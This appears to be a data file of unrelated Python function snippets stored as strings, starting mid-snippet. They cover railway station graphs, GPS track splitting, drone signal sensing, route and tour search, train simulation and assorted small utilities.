new_station.add_connection(first_station, new_time)\n\n # add stations to visited\n visited.append(first_station.name)\n visited.append(new_station.name)\n\n # runs until all stations are visited\n while len(visited) is not len(self.prims_tree):\n # starts as arbitrarily high number\n min_connection_time = 9999\n\n # get connections of visited stations\n for station in visited:\n connections = self.stations[station].get_connections()\n\n # get time of connections\n for connection in connections:\n connection_time = connections[connection]\n\n # save smallest connection if time is smallest and station is not visited\n if connection.name not in visited and connection_time < min_connection_time:\n smallest_connection = self.prims_tree[connection.name]\n smallest_connection_station = self.prims_tree[station]\n min_connection_time = connection_time\n else:\n continue\n\n # add smallest connection to station in prims_tree dictionary\n smallest_connection_station.add_connection(smallest_connection, min_connection_time)\n smallest_connection.add_connection(smallest_connection_station, min_connection_time)\n\n # add new connection to visited list\n visited.append(smallest_connection.name)\n\n return self.prims_tree", "def add_connection_ending(self, route, potential_solution):\n\n current_station = route.stations[-1]\n new_station = random.choice(list(current_station.connections.keys()))\n link = current_station.connections[new_station] \n time = link.time \n \n\n # only accept the change if it wouldn't exceed the maximum time\n if time + route.total_time <= self.max_minutes:\n \n # insert the connection to the front of the connection list\n route.insert_connection(link, time, -1)\n\n # insert the station to the front of the station list\n route.insert_station(new_station, -1)", "def create_tracks(self, min_interval=30, max_interval=2700, min_length=0.1):\n # Our waypoints for this jaunt\n waypoints = self.waypoints.all().order_by('gmtime')\n\n # Set up accumulating variables\n previous = False\n length = 0\n track_count = 1\n # Set the first times on the trap\n first_wp = waypoints[0]\n # Create first track and 0 out variables\n tracks = Track.objects.filter(start_time=first_wp.localtime)\n if tracks:\n track = tracks[0]\n index = 0\n for mt in tracks:\n if index > 0:\n mt.delete()\n index += 1\n\n else:\n track = Track()\n\n track.name = \"%s %d\" % (self.name, track_count)\n track.description = ''\n track.length = 0\n track.ascent = 0\n track.descent = 0\n track.altitude_max = 0\n track.altitude_min = 1000\n track.gpx_file = self\n track.start_time = first_wp.gmtime\n track.end_time = first_wp.gmtime\n track.save()\n\n # Loop through waypoints and measure distances\n for wp in waypoints:\n\n too_long = False\n too_far = False\n too_short = False\n\n if not previous:\n track.waypoints.add(wp)\n previous = wp\n else:\n secs_elapsed = wp.gmtime - previous.gmtime\n if secs_elapsed.seconds > max_interval or secs_elapsed.days > 0:\n too_long = True\n # assert False, [wp,previous,secs_elapsed.seconds,max_interval]\n if secs_elapsed.seconds < min_interval:\n too_short = True\n\n if too_long:\n\n # Add track if it's long enough\n if length > min_length:\n\n track.name = \"%s %d\" % (self.name, track_count)\n track.save()\n self.track_set.add(track)\n\n # Normalise altitude of first waypoint\n# w1 = track.waypoints.all().order_by('gmtime')[0]\n# w2 = track.waypoints.all().order_by('gmtime')[1]\n# w1.altitude = w2.altitude\n# if w1.gmtime == w2.gmtime and w1.latitude == w2.latitude and w1.longitude == w2.latitude:\n# w1.delete()\n# w2.save()\n# else:\n# print w1.id, w1.latitude,w1.longitude,w1.gmtime,w1.altitude\n# w1.save()\n#\n# # Normalise altitude of last waypoint\n# w1 = track.waypoints.all().order_by('-gmtime')[0]\n# w2 = track.waypoints.all().order_by('-gmtime')[1]\n# w1.altitude = w2.altitude\n# if w1.gmtime == w2.gmtime and w1.latitude == w2.latitude and w1.longitude == w2.latitude:\n# w1.delete()\n# w2.save()\n# else:\n# w1.save()\n\n track.update_data()\n\n else:\n track.delete()\n #\n track_count += 1\n # Create new track and 0 out variables\n tracks = Track.objects.filter(start_time=wp.localtime)\n if tracks:\n track = tracks[0]\n index = 0\n for mt in tracks:\n if index > 0:\n mt.delete()\n index += 1\n\n else:\n track = Track()\n\n track.name = \"%s %d\" % (self.name, track_count)\n track.description = ''\n track.length = 0\n track.ascent = 0\n track.descent = 0\n track.altitude_max = 0\n track.altitude_min = 1000\n track.start_time = wp.gmtime\n track.end_time = wp.gmtime\n track.gpx_file = self\n track.save()\n\n # Set up accumulating variables\n previous = False\n length = 0\n track.waypoints.add(wp)\n previous = wp\n # elif too_short:\n # previous = previous\n else:\n\n length += get_distance(previous, wp)\n track.waypoints.add(wp)\n previous = wp\n # del(waypoints)\n\n # Add track if it's long enough\n if length > min_length:\n track_count += 1\n track.name = \"%s %d\" % (self.name, track_count)\n track.save()\n self.track_set.add(track)\n track.update_data()\n\n else:\n track.delete()", "def __init__(self, min_player_count):\n self.min_player_count = min_player_count", "def start_wireless_sensing(self):\n\n gps_pos = self.dc.read_gps()\n n_samples = 256 # DON'T CHANGE TO 128!!!!! IT CAUSES KERNEL PANIC (unless you change tick or find another fix)\n if IS_SIMULATION:\n dBm = self.get_simulated_dBm()\n # dBm = random.uniform(-1, -10)\n self.dBm = dBm\n self.ContSamples += 1\n time.sleep(0.01)\n else:\n self.ContSamples += 1\n samples = self.sdr.read_samples(n_samples)\n dBm = 10 * np.log10(np.mean(np.power(np.abs(samples), 2)))\n self.dBm = dBm\n\n if self.ContSamples > self.SamplesToDiscard:\n\n wireless_msg0 = HotspotWirelessMessage(\n location=gps_pos,\n sdr=[],\n dBm=dBm,\n )\n self.flight_logger.log(wireless_msg0)\n\n now = time.time()\n # if ((dBm > THRESHOLD_dBm) and (now - self.lastInsert) >= THRESHOLD_Sampling):\n\n if (now - self.lastInsert) >= THRESHOLD_Sampling:\n if self.FLAG == 2:\n wireless_msg = HotspotWirelessMessage(\n location=self.dc.read_gps(),\n sdr=[],\n dBm=self.dBm,\n )\n self.wireless_logger.log(wireless_msg)\n\n if self.FLAG == 1:\n wireless_msg2 = HotspotFilterMessage(\n hotcaltime=self.hottime,\n alepcaltime=self.aleptime,\n survetime=self.surveytime,\n swarmtime=self.swarmtime,\n FLAG=self.FLAG,\n location=self.dc.read_gps(),\n sdr=[],\n dBm=self.dBm,\n )\n\n self.wireless_filter.log(wireless_msg2)\n\n self.wireless_data.append(wireless_msg0)\n\n self.lastInsert = time.time()\n # if len(self.wireless_data) >= SAMPLES_SWARM * self.sentData:\n if len(self.wireless_data) >= SAMPLES_SL:\n # self.sentData +=1\n self.ready_to_send = True", "def shortest_tour(all_tours):\n shortest = all_tours[0]\n \n for tour in all_tours:\n if tour_distance(shortest) > tour_distance(tour):\n shortest = tour\n return shortest", "def _load_stations(self, nodes: List[OSMNode]) -> None:\n # Process OSM nodes into intermediate stations\n grouped_stations: defaultdict[str, list[IntermediateStation]] = defaultdict(list)\n\n # Iterate thru nodes while popping them from the provided list\n # to allow used nodes to bne garbage collected.\n while nodes:\n node = nodes.pop()\n name_id = node.tags[\"name\"]\n grouped_stations[name_id].append(IntermediateStation(\n node.id,\n name_id,\n node.lat,\n node.lon,\n [k for (k, v) in node.tags.items() if \".\" in k and v == \"yes\"],\n node.tags.get(\"merged\") == \"all\",\n ))\n\n # Convert the intermediate representations to GeoStation\n # (again popping from grouped_stations to allow intermediate representation to be gc-ed)\n while grouped_stations:\n name_id, stations = grouped_stations.popitem()\n merged_all_node = get_merged_all_node(stations)\n\n if len(stations) == 1 and len(stations[0].routes) == 1:\n # Case 1 - one station and one line.\n sta = stations[0]\n sta_id = sta.routes[0] + \".\" + name_id\n self.by_id[sta_id] = GeoStation(sta_id, sta.lat, sta.lon)\n\n elif len(stations) == 1:\n # Case 2 - one station and multiple lines.\n # Simple parent-children structure, all in one location.\n sta = stations[0]\n parent = GeoStation(\"Merged.\" + name_id, sta.lat, sta.lon)\n self.by_id[parent.id] = parent\n\n for route in sta.routes:\n child = GeoStation(route + \".\" + name_id, sta.lat, sta.lon, parent=parent)\n self.by_id[child.id] = child\n parent.children.append(child)\n\n elif merged_all_node:\n # Case 3: many nodes, but all under one parent\n parent = GeoStation(\"Merged.\" + name_id, merged_all_node.lat, merged_all_node.lon)\n self.by_id[parent.id] = parent\n\n for ista in stations:\n for route in ista.routes:\n child = GeoStation(route + \".\" + name_id, ista.lat, ista.lon,\n parent=parent)\n self.by_id[child.id] = child\n parent.children.append(child)\n\n else:\n # Case 4: many nodes, no parent-of-all\n needs_merged_no = count_multiple_routes(stations) > 1\n merged_no = 1\n\n for sta in stations:\n if len(sta.routes) == 1:\n # Case 4.1 - single line - behavior as in case 1\n sta_id = sta.routes[0] + \".\" + name_id\n self.by_id[sta_id] = GeoStation(sta_id, sta.lat, sta.lon)\n\n else:\n # Case 4.2 - multiple lines - behavior as in case 2\n parent_prefix = \"Merged.\"\n if needs_merged_no:\n parent_prefix = f\"Merged.{merged_no}.\"\n merged_no += 1\n\n parent = GeoStation(parent_prefix + name_id, sta.lat, sta.lon)\n self.by_id[parent.id] = parent\n\n for route in sta.routes:\n child = GeoStation(route + \".\" + name_id, sta.lat, sta.lon,\n parent=parent)\n self.by_id[child.id] = child\n parent.children.append(child)", "def start_trip(self, live):\n t = Trip(live)\n self.current_trip = t\n if live:\n # Send a request for a new trip to the remote server\n self.get_connection().start_trip()\n else:\n # Add a new trip to the local database\n self.get_database().start_trip(t)", "def swarm_track(self, *args, **kwargs):\n if self.st_type == \"track\" and SHOULD_WAIT:\n if len(self.completion_messages) < len(self.neighbors):\n return\n\n # TODO: make all drones know the st_type. Now only master knows\n if self.st_type == \"simple-track\":\n positions = []\n # Using separate pos_dict because find_center accepts a dictionary as argument\n # Todo: make find_center applicable to lists\n pos_dict = dict()\n dBms = []\n\n for ip, data in self.all_drones_data.items():\n pos_dict[ip] = Coordinate(data['lat'], data['lon'])\n positions.append(pos_dict[ip])\n dBms.append(data['dBm'])\n\n max_dBm_index = dBms.index(max(dBms))\n center_coord = self.find_center(pos_dict)\n pos_with_max_dBm = positions[max_dBm_index]\n max_dBm_bearing = center_coord.bearing_toward(pos_with_max_dBm)\n\n move_distance = 3 # meters\n combo_hotspot = center_coord.offset_bearing(max_dBm_bearing, move_distance)\n else:\n alphas = []\n epsilons = []\n shared_data = []\n for drone_ip, drone_port in self.neighbors:\n self.log.debug('Requesting data from drone {}'.format(drone_ip))\n local_alpha, local_epsilon, samples = send(\n drone_ip=drone_ip,\n mission_id=self.mission_id,\n endpoint='/share',\n skyserve_port=drone_port,\n ).json().get('data', {})\n if local_alpha == 0.0 and local_epsilon == 0.0:\n return\n self.log.debug('Received data')\n alphas.append(local_alpha)\n epsilons.append(local_epsilon)\n samples = [[sample['lat'],\n sample['lon'],\n sample['alt'],\n sample['dBm']] for sample in json.loads(samples)]\n\n shared_data.append(samples)\n\n drone_count = len(self.neighbors)\n\n prediction = predict(dronenum=drone_count,\n maxRun=1,\n numIterations=GDParameters.NUM_ITERATIONS,\n numEpoch=GDParameters.NUM_EPOCH,\n threshold=GDParameters.THRESHOLD,\n learning_rate=GDParameters.LEARNING_RATE,\n numberBatch=1,\n data_length=SAMPLES_SWARM*drone_count)\n\n if 1 < drone_count <= 3:\n try:\n start = time.time()\n hotspot = prediction.swarm(drone_data=shared_data,\n alphas=alphas,\n epsilons=epsilons)\n end = time.time()\n self.swarmtime = end - start\n self.log.debug('Drone is using data from {a} drones'.format(a=drone_count))\n except IndexError:\n self.log.warn('Hotspot localization failed. Data not good enough.')\n return\n else:\n self.log.warn('Drone Number Incorrect')\n return\n\n combo_hotspot = Coordinate(hotspot[0], hotspot[1])\n\n self.log.debug('=========================================================================')\n self.log.debug('Calculated new hotspot at location: {}'.format(combo_hotspot))\n # TODO: allow this to run in all mission types\n # This would require implementing simulated cheater in all types, not just track\n # if IS_SIMULATION and (self.st_type == \"track\" or self.st_type == \"simple-track\"):\n if IS_SIMULATION:\n error = combo_hotspot.distance_to(self.current_simulated_hotspot)\n self.log.debug('Simulated error: {err}, Simulated hotspot has moved {dist} meters to: {loc}'.format(\n err=error,\n dist=self.hotspot_meters_moved,\n loc=self.current_simulated_hotspot\n ))\n self.log.debug('=========================================================================')\n\n if not self.region.contains(combo_hotspot) and not IS_SIMULATION:\n self.log.debug('New hotspot is out of region')\n return\n\n if self.st_type == \"track\" or self.st_type == \"simple-track\":\n self.completion_messages = set()\n\n if self.st_type != \"hover\" and self.st_type != \"spin\":\n for drone_idx, (drone_ip, drone_port) in enumerate(self.neighbors):\n self.log.debug('Sending drone at IP {drone_ip} to new hotspot location.'.format(\n drone_ip=drone_ip,\n ))\n\n send(\n drone_ip=drone_ip,\n mission_id=self.mission_id,\n endpoint='/swarm',\n data={\n 'lat': combo_hotspot.lat,\n 'lon': combo_hotspot.lon,\n },\n skyserve_port=drone_port,\n async=True,\n )", "def enter_pending_start(self, count=10):\n self.app.pingWebSessions()\n\n if count == 0:\n self.app.admin.hangup(self.channel)\n\n d = self.agi.streamFile(\"weareforests-audio/welcome\", chr(self.digit))\n def audioDone(r):\n digit, offset = r\n if digit == self.digit:\n self.setStateAfterSample(\"start\", \"weareforests-audio/shortsilence\")\n else:\n self.state.set(\"pending_start\", count-1)\n d.addCallback(audioDone)\n d.addErrback(self.catchHangup)", "def stations(update, context):\n db_helper.insert_chat_id(update.effective_chat.id)\n message = processor.process_stations_chat(update, context)\n processor.send_message(update, context, message)", "def _add_start_entry(self):\n return self._db.insert(\n {'device': self._device, 'string': self._string, 'start': datetime.utcnow(), 'duration': 0})", "def firstTracks(analyzer):\n return lt.subList(analyzer['tracks'],0,4)", "def earliest_arrival(jump_distance, stones):\n #jump_distance of 3 means they skip 2 stones and land on 3rd\n stone = ''\n #based on jump_distance, what are all the stone nums within that distance\n #when jump_distance is 5, can jujp to stones[4]\n \n stone = min(stones[:(jump_distance - 1)]) #stone = 2\n\n t = max(0, stone) #t = 2\n print(f't starts at = {t}')\n i = stones.index(stone) # i = 1\n print(f'i starts at = {i}') \n #as long as \n while i + jump_distance <= len(stones) - 1: # 3 + 5 <= 7\n print(f'i + jump_distance = {i + jump_distance}')\n\n stone = min(stones[(i + 1):(i + jump_distance)]) #stone = 3\n print(f'stone: {stone}')\n if t < stone: \n t = stone #reassign to 3\n \n i = stones.index(stone) # i = 2\n print(f'i = {i}') \n stone = min(stones[(i + 1):(i + jump_distance)]) #stone \n t = max(t, stone)\n print(f'end of while loop: t = {t}') \n \n return t\n #what's the lowest num within that jump_distance \n #go to that stone, then look at next stones in new jump_distance\n #t becomes whatever stone we jumped to\n #if the next stone we jump to is a higher value, reassign t\n #get length of list of stones so we don't go past length\n #var assigned to len(list) and compare to index we're at \n #if index we're jumping to is higher than len of list, then we're done\n #control for indexerror with while loop?\n # ", "def start_trip(self, at_time: float):\n self.start_time = at_time\n self.traveled_nodes = [(at_time, self.base_route[0])] # Start node", "def choose_next_target(self, old_sInd, sInds, slewTimes, intTimes):\n\n Comp = self.Completeness\n TL = self.TargetList\n TK = self.TimeKeeping\n OS = self.OpticalSystem\n Obs = self.Observatory\n allModes = OS.observingModes\n\n # cast sInds to array\n sInds = np.array(sInds, ndmin=1, copy=False)\n\n if OS.haveOcculter:\n # current star has to be in the adjmat\n if (old_sInd is not None) and (old_sInd not in sInds):\n sInds = np.append(sInds, old_sInd)\n \n # calculate dt since previous observation\n dt = TK.currentTimeNorm.copy() + slewTimes[sInds] - self.lastObsTimes[sInds]\n # get dynamic completeness values\n comps = Comp.completeness_update(TL, sInds, self.starVisits[sInds], dt)\n \n # if first target, or if only 1 available target, \n # choose highest available completeness\n nStars = len(sInds)\n if (old_sInd is None) or (nStars == 1):\n sInd = np.random.choice(sInds[comps == max(comps)])\n return sInd, None\n \n # define adjacency matrix\n A = np.zeros((nStars,nStars))\n \n # only consider slew distance when there's an occulter\n if OS.haveOcculter:\n r_ts = TL.starprop(sInds, TK.currentTimeAbs)\n u_ts = (r_ts.value.T/np.linalg.norm(r_ts, axis=1)).T\n angdists = np.arccos(np.clip(np.dot(u_ts, u_ts.T), -1, 1))\n A[np.ones((nStars), dtype=bool)] = angdists\n A = self.coeffs[0]*(A)/np.pi\n \n # add factor due to completeness\n A = A + self.coeffs[1]*(1 - comps)\n \n # add factor due to unvisited ramp\n f_uv = np.zeros(nStars)\n unvisited = self.starVisits[sInds]==0\n f_uv[unvisited] = float(TK.currentTimeNorm.copy()/TK.missionLife.copy())**2\n A = A - self.coeffs[2]*f_uv\n\n # add factor due to revisited ramp\n # f2_uv = np.where(self.starVisits[sInds] > 0, 1, 0) *\\\n # (1 - (np.in1d(sInds, self.starRevisit[:,0],invert=True)))\n f2_uv = 1 - (np.in1d(sInds, self.starRevisit[:,0]))\n A = A + self.coeffs[3]*f2_uv\n \n # kill diagonal\n A = A + np.diag(np.ones(nStars)*np.Inf)\n \n # take two traversal steps\n step1 = np.tile(A[sInds==old_sInd,:], (nStars, 1)).flatten('F')\n step2 = A[np.array(np.ones((nStars, nStars)), dtype=bool)]\n tmp = np.argmin(step1 + step2)\n sInd = sInds[int(np.floor(tmp/float(nStars)))]\n\n else:\n nStars = len(sInds)\n\n # 1/ Choose next telescope target\n comps = Comp.completeness_update(TL, sInds, self.starVisits[sInds], TK.currentTimeNorm.copy())\n\n # add weight for star revisits\n ind_rev = []\n if self.starRevisit.size != 0:\n dt_rev = self.starRevisit[:,1]*u.day - TK.currentTimeNorm.copy()\n ind_rev = [int(x) for x in self.starRevisit[dt_rev < 0 , 0] if x in sInds]\n\n f2_uv = np.where((self.starVisits[sInds] > 0) & (self.starVisits[sInds] < self.nVisitsMax), \n self.starVisits[sInds], 0) * (1 - (np.in1d(sInds, ind_rev, invert=True)))\n\n weights = (comps + self.revisit_weight*f2_uv/float(self.nVisitsMax))/intTimes\n\n sInd = np.random.choice(sInds[weights == max(weights)])\n\n waitTime = slewTimes[sInd]\n #Check if exoplanetObsTime would be exceeded\n mode = list(filter(lambda mode: mode['detectionMode'] == True, allModes))[0]\n maxIntTimeOBendTime, maxIntTimeExoplanetObsTime, maxIntTimeMissionLife = TK.get_ObsDetectionMaxIntTime(Obs, mode)\n maxIntTime = min(maxIntTimeOBendTime, maxIntTimeExoplanetObsTime, maxIntTimeMissionLife)#Maximum intTime allowed\n intTimes2 = self.calc_targ_intTime(sInd, TK.currentTimeAbs.copy(), mode)\n if intTimes2 > maxIntTime: # check if max allowed integration time would be exceeded\n self.vprint('max allowed integration time would be exceeded')\n sInd = None\n waitTime = 1.*u.d\n \n return sInd, waitTime", "def add_person_to_the_station(self, line, station):\n\n if line in self.__stations_dict:\n if station in self.__stations_dict[line]:\n self.__stations_dict[line][station] += 1\n else:\n self.__stations_dict[line][station] = 1\n else:\n self.__stations_dict[line] = {station: 1}", "def test_get_closest_stations(self):\n\t\tpoint = \"POINT(40.71911552 -74.00666661)\"\n\t\tstations = set(server.get_closest_stations(point))\n\t\t# find the closest stations, make them a set of objects see if sets intersect completely", "def update_base_stations_in_range(self, base_station_list):\r\n self.base_stations_in_range = []\r\n for station in base_station_list:\r\n # Don't compare a base station with itself\r\n if station != self:\r\n for freq_range in station.currently_used_frequencies:\r\n received_power = self.calculate_signal_power(\r\n station, freq_range)\r\n if received_power > settings.power_threshold:\r\n self.base_stations_in_range.append(\r\n [station, freq_range])", "def shortest_tips(neuron):\n (branch_index,) = np.where(neuron.branch_order[neuron.n_soma:] == 2)\n (endpoint_index,) = np.where(neuron.branch_order[neuron.n_soma:] == 0)\n selected_index = np.union1d(endpoint_index + 1,\n branch_index + 1)\n selected_index = np.append(0, selected_index)", "def start(update: Update, context: CallbackContext):\n first_set(update, type=\"initial\")", "def min_players(self, min_players):\n\n self._min_players = min_players", "def lowest_simulation(num):\n routes = {}\n for i in range(num):\n itinerary = greedy_path()\n distance = get_total_distance(itinerary)\n routes[distance] = itinerary\n shortest_distance = min(routes.key())\n route = routes[shortest_distance]\n return shortest_distance, route", "def minimum_spanning_tree(self, start_vertex):\n\n # Initialize sets of seen variables to far in the algorithm\n taken_edges = set()\n taken_vertices = set([start_vertex])\n all_vertices = set(self._edges.keys())\n \n # Create a list from the neighbors, heapify to turn into a queue\n neighbors_iterator = ((w, (start_vertex, v)) for (v, w) in \n self.neighbors(start_vertex, and_weights=True))\n queue = list(neighbors_iterator)\n heapq.heapify(queue)\n \n # While not every single vertex is taken\n while not (taken_vertices == all_vertices):\n\n # Pop the minimum edge (u, v) from the priority queue\n weight, (u, v) = heapq.heappop(queue)\n\n # If v is already taken, we have a cycle and continue\n if v in taken_vertices:\n continue\n \n # If v is not already taken, add the edge and vertex to the sets\n taken_vertices.add(v)\n taken_edges.add((frozenset((u, v)), weight))\n \n # Get edges going out to neighbors of v, i.e. every (v, u)\n for (u, w) in self.neighbors(v, and_weights=True):\n\n # If u is taken the edge is not interesting, since it would\n # add a cycle. If it's not taken, add to the queue\n # This if-statement speeds up computations from 5 to 4.5s\n if u not in taken_vertices:\n heapq.heappush(queue, (w, (v, u)))\n \n # The minimum spanning tree is found. Extract information and create\n # a new graph from it.\n mst_edges = [(u, v) for ((u, v), weight) in taken_edges]\n mst_weights = [weight for ((u, v), weight) in taken_edges]\n \n return type(self)(mst_edges, mst_weights)", "def add_next(self, requester: int, track: dict):\n self.queue.insert(0, AudioTrack().build(track, requester))", "def set_start(self, ts):\n base_key = self.floor_time(ts)\n if self.first_timestamp is None or base_key < self.first_timestamp:\n self.first_timestamp = base_key", "def add_stations(stations, pool):\n\n for station in stations:\n\n print(add_station(pool=pool, name=station.get('name'), latitude=station.get('latitude'),\n longitude=station.get('longitude'), station_type=station.get('station_type'),\n description=station.get('description')))\n print(station.get('name'))", "def add_picks(sta, e, orig_time, st, cfg):\n from obspy.core.event import (Pick, WaveformStreamID, EvaluationMode,\n QuantityError)\n for n_p, p in enumerate(sta[\"best_obs\"]):\n if n_p == 0:\n phase = \"P\"\n elif n_p == 1:\n phase = \"S\"\n if p and p[3] != 4:\n pick = Pick(waveform_id=WaveformStreamID(\n network_code=st[0].stats.network,\n station_code=st[0].stats.station,\n channel_code=p[2]),\n time=p[0], phase_hint=phase,\n evaluation_mode=EvaluationMode(\"automatic\"),\n time_errors=QuantityError(\n uncertainty=cfg.picking.T_ERRORS[p[3]]))\n e.picks.append(pick)\n return(e)", "def audio_cd_start_track(self, audio_cd_start_track):\n self._audio_cd_start_track = audio_cd_start_track", "def update_train_loc(self):\n\n trains_on_green = [] # Keep running list of blocks a train is on\n trains_on_red = []\n\n i = 0\n while i < len(self.trains_arr):\n if self.trains_arr[i].line_on == Line.LINE_GREEN:\n\n # If train has not made it out of the yard yet\n if self.trains_arr[i].index_on_route == 0:\n if self.trains_arr[i].route_blocks_arr[1] not in trains_on_green:\n if self.blocks_green_arr[self.trains_arr[i].route_blocks_arr[1] - 1]\\\n .occupied:\n self.trains_arr[i].index_on_route += 1\n trains_on_green.append(self.trains_arr[i].route_blocks_arr[1])\n else:\n i += 1\n continue\n # If train has reached the yard\n elif self.trains_arr[i].index_on_route == (len(self.trains_arr[i].route_blocks_arr\\\n ) - 1):\n self.trains_arr.pop(i)\n self.train_numbers.pop(i)\n i -= 1\n # If train is already on tracks; Advance train if block it says its on is\n # not occupied\n else:\n if not self.blocks_green_arr[self.trains_arr[i].route_blocks_arr\\\n [self.trains_arr[i].index_on_route] - 1].occupied:\n\n self.trains_arr[i].index_on_route += 1\n\n if self.trains_arr[i].authority == 1:\n self.trains_arr[i].authority = 3\n else:\n self.trains_arr[i].authority -= 1\n\n if self.trains_arr[i].command_speed == 70:\n self.trains_arr[i].command_speed = 71\n else:\n self.trains_arr[i].command_speed = 70\n\n # Send upated command speed and authority to SW Track Controller\n signals.swtrack_update_authority.emit(self.trains_arr[i].train_id,\\\n self.trains_arr[i].authority)\n signals.swtrack_update_speed.emit(self.trains_arr[i].train_id,\\\n self.trains_arr[i].command_speed)\n trains_on_green.append(self.trains_arr[i].route_blocks_arr\\\n [self.trains_arr[i].index_on_route])\n else:\n i += 1\n continue\n\n # If Line on RED\n else:\n # If train has not made it out of the yard yet\n if self.trains_arr[i].index_on_route == 0:\n if self.trains_arr[i].route_blocks_arr[1] not in trains_on_red:\n if self.blocks_red_arr[self.trains_arr[i].route_blocks_arr[1] - 1]\\\n .occupied:\n self.trains_arr[i].index_on_route += 1\n trains_on_red.append(self.trains_arr[i].route_blocks_arr[1])\n else:\n i += 1\n continue\n # If train has reached the yard\n elif self.trains_arr[i].index_on_route == (len(self.trains_arr[i].route_blocks_arr\\\n ) - 1):\n self.trains_arr.pop(i)\n self.train_numbers.pop(i)\n i -= 1\n # If train is already on tracks; Advance train if block it says its on is\n # not occupied\n else:\n if not self.blocks_red_arr[self.trains_arr[i].route_blocks_arr\\\n [self.trains_arr[i].index_on_route] - 1].occupied:\n\n self.trains_arr[i].index_on_route += 1\n\n if self.trains_arr[i].authority == 1:\n self.trains_arr[i].authority = 3\n else:\n self.trains_arr[i].authority -= 1\n\n if self.trains_arr[i].command_speed == 70:\n self.trains_arr[i].command_speed = 71\n else:\n self.trains_arr[i].command_speed = 70\n\n # Send upated command speed and authority to SW Track Controller\n signals.swtrack_update_authority.emit(self.trains_arr[i].train_id,\\\n self.trains_arr[i].authority)\n signals.swtrack_update_speed.emit(self.trains_arr[i].train_id,\\\n self.trains_arr[i].command_speed)\n trains_on_red.append(self.trains_arr[i].route_blocks_arr\\\n [self.trains_arr[i].index_on_route])\n else:\n i += 1\n continue\n i += 1", "def _pick_server(self, key, inport): #key = ipp.srcip, ipp.dstip, tcpp.srcport, tcpp.dstport\n\n if len(self.total_connection) == 0: # {server_IP : total connection}\n return self.live_servers.keys()[0] #{IP : MAC,port}\n ipserver = self.total_connection.keys()[0]\n totalconns = self.total_connection[ipserver]\n \"\"\"\n Select server with least connections\n \"\"\"\n if len(self.total_connection) == 0:\n return self.live_servers.keys()[0]\n ipserver = self.total_connection.keys()[0]\n totalconns = self.total_connection[ipserver]\n \n for x in self.total_connection: #finding the server IP having least no. of connections\n if self.total_connection[x] < totalconns:\n ipserver = x\n totalconns = self.total_connection[x]\n self.log.debug(\"Best available server: %s\" % ipserver)\n return ipserver", "def _get_earliest_start(self, valid_list):\n\n return min([item.coords[\"time\"].values[0] for item in valid_list])", "def find_straight_tracks(data_dict, scifi_event) :\n scifi_tracks = scifi_event.scifitracks()\n upstream_tracks = []\n downstream_tracks = []\n for track in scifi_tracks :\n if track.GetAlgorithmUsed() != STRAIGHT_ALGORITHM_ID :\n continue\n\n if track.tracker() == 0 :\n upstream_tracks.append(track)\n elif track.tracker() == 1 :\n downstream_tracks.append(track)\n\n# Only looking for single track events at present implementation\n track_list = []\n if len( upstream_tracks ) != 1 :\n return track_list\n if len( downstream_tracks) != 1 :\n return track_list\n\n track_list.append((upstream_tracks[0], downstream_tracks[0]))\n\n return track_list", "def _create_new_route(self, tick):\n if self.target_node_id is None:\n self.source_node_id = random.choice(Network.nodes).getID()\n else:\n self.source_node_id = self.target_node_id # We start where we stopped\n # random target\n self.target_node_id = random.choice(Network.nodes).getID()\n self.current_route_id = self.id + \"-\" + str(self.rounds)\n self.current_router_result = CustomRouter.minimal_route(self.source_node_id, self.target_node_id)\n \n if len(self.current_router_result.edges) > 0:\n traci.route.add(self.current_route_id, self.current_router_result.edges)\n return self.current_route_id\n else:\n # try again\n return self._create_new_route(tick)", "def NewStartingIndex(self) -> int:", "def minimum_sampling(self):\n # TODO: Allow `Source` to understand when this returns None?\n return 1.", "def CheckMinStationCount(ConnectionInfo, PathInfo, MinStationCount, EndStation, RouteConditions):\r\n\tif MinStationCount == None: return True\r\n\tNextStation = ConnectionInfo[ConnInfoInd['station_to']]\r\n\r\n\tif CheckIfPathTerminatesSuccessfully(ConnectionInfo, PathInfo, RouteConditions, EndStation) and len(PathInfo) < (MinStationCount-1):\r\n\t\treturn False\r\n\telse:\r\n\t\treturn True", "def __init__ (self, len_connections, station_objects, solution, max_minutes):\n\n self.len_connections = len_connections\n self.station_objects = station_objects\n self.state = copy.deepcopy(solution) \n self.K = self.state.set_K(len_connections)\n self.lining = []\n self.max_minutes = max_minutes", "def fill_first_stool(self: 'TOAHModel', number_of_cheeses: int):\n self._number_of_cheeses = number_of_cheeses\n first_stool = self.stool_lst[0]\n for cheese in range(1, number_of_cheeses+1):\n first_stool.append(Cheese(cheese))\n first_stool.sort(key = lambda cheese:cheese.size, reverse=True)\n self.end_game_stool = first_stool.copy()", "def addDistToTrack(track):\n\tfor i in range(0, len(track)):\t\t\n\t\tif (i == 0):\n\t\t\tprev = track[i]\t\t\t\n\t\t\ttrack[i].append(0)\n\t\telse:\n\t\t\tprev = track[i-1]\n\t\t\ttrack[i].append(getDist(prev[0], prev[1], track[i][0], track[i][1]))\t\n\treturn track", "def nearest_neighbor(self):\n steps = [{'Tour': [], 'Tourlength': 0}]\n tour = []\n original_nodes = self._datacontroller.get_data('nodes')\n nodes = copy.deepcopy(original_nodes)\n scale = self._datacontroller.get_data('scale')\n\n # Step 1: Get a tour start\n starts = [node for node in nodes if node.start]\n _start = 'Random from marked nodes'\n if not len(starts):\n starts = nodes\n _start = 'Random from all nodes'\n\n current = starts[randint(0, (len(starts) - 1))]\n while True:\n tour.append(current.nid)\n nodes.remove(current)\n steps.append(construct_step(tour, str(_start), 'random', original_nodes, scale))\n if not len(nodes):\n break\n current = nodes[tsputil.nearest_neighbor(nodes, current)[0]]\n tour.append(tour[0])\n steps.append(construct_step(tour, str(_start), 'random', original_nodes, scale))\n self._datacontroller.commit_change('pathsteps', steps)\n self._datacontroller.commit_change('path', steps[-1])", "def get_lowestbin_from_searchdata(self):\n # Get target players IDs\n playerids = []\n txt = open(\"./data/player_list.txt\", \"r\", encoding=\"utf8\")\n for aline in txt:\n values2 = aline.strip(\"\\n\").split(\",\")\n # make sure it doesn't read in the blank line at end of file\n if (len(values2) > 5):\n id = values2[7]\n playerids.append(id)\n txt.close()\n\n # Find cheapest listing from market data\n id_and_lowest_bin = [] # this will hold (id, lowest bin)\n for playerid in playerids:\n playerid = int(playerid)\n buynowprices = []\n\n futbin_price = 0\n txt = open(\"./data/market_logs.txt\", \"r\", encoding=\"utf8\")\n for aline in txt:\n player = aline.strip(\"\\n\").split(\",\")\n if (len(player) > 3):\n playername = player[5]\n marketid = int(player[10])\n overall = player[4]\n\n timeremainingSeconds = player[9]\n 